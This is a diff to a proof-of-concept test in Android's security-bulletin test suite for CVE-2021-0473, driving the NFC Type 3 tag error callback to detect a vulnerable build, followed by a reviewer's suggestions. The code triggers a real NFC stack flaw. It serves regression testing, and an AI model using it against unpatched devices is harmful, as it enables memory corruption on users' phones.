Diffstat (limited to 'hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp')
-rw-r--r-- | hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp | 40 |
1 files changed, 22 insertions, 18 deletions
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
index d7650ad4d5f..152f5384323 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-0473/poc.cpp
@@ -92,27 +92,31 @@ void GKI_freebuf(void *ptr) {
 }
 
 int main() {
- tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t;
+ tNFC_ACTIVATE_DEVT p_activate_params = {};
+ p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
+ p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
+ RW_SetActivatedTagType(&p_activate_params, &poc_cback);
+ FAIL_CHECK(rw_cb.p_cback == &poc_cback);
 
- GKI_init();
- rw_init();
- rw_cb.p_cback = &poc_cback;
+ tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t;
 
- uint8_t peerNfcID[NCI_RF_F_UID_LEN];
- uint8_t mrtiCheck = 1, mrtiUpdate = 1;
- if (rw_t3t_select(peerNfcID, mrtiCheck, mrtiUpdate) != NFC_STATUS_OK) {
- return EXIT_FAILURE;
- }
+ GKI_init();
+ rw_init();
+ rw_cb.p_cback = &poc_cback;
+
+ uint8_t peerNfcID[NCI_RF_F_UID_LEN];
+ uint8_t mrtiCheck = 1, mrtiUpdate = 1;
+ FAIL_CHECK(rw_t3t_select(peerNfcID, mrtiCheck, mrtiUpdate) == NFC_STATUS_OK);
 
- tNFC_CONN p_data = {};
- NFC_HDR nfcHdr = {};
- p_data.data.p_data = &nfcHdr;
+ tNFC_CONN p_data = {};
+ NFC_HDR nfcHdr = {};
+ p_data.data.p_data = &nfcHdr;
 
- tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
- p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
+ tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
 
- uint8_t conn_id = NFC_RF_CONN_ID;
- tNFC_CONN_EVT event = NFC_ERROR_CEVT;
- p_cb->p_cback(conn_id, event, &p_data);
- return (kIsVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
+ uint8_t conn_id = NFC_RF_CONN_ID;
+ tNFC_CONN_EVT event = NFC_ERROR_CEVT;
+ p_cb->p_cback(conn_id, event, &p_data);
+ return (kIsVulnerable) ? EXIT_VULNERABLE : EXIT_SUCCESS;
 } |
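Review bot: `p_cb->p_cback(conn_id, event, &p_data);` near the end of main() calls the connection callback without first checking that one is registered. Presumably rw_t3t_select() installs it, but that is not visible in this hunk; if it does not on some build, the PoC dies on a null call and the harness may read the crash as something other than a setup failure. Since the change already converts the setup steps to FAIL_CHECK, I would add `FAIL_CHECK(p_cb->p_cback != nullptr);` just before the call. Separately, `peerNfcID` is passed to rw_t3t_select() uninitialised; `uint8_t peerNfcID[NCI_RF_F_UID_LEN] = {};` would keep the run deterministic, particularly under sanitizers.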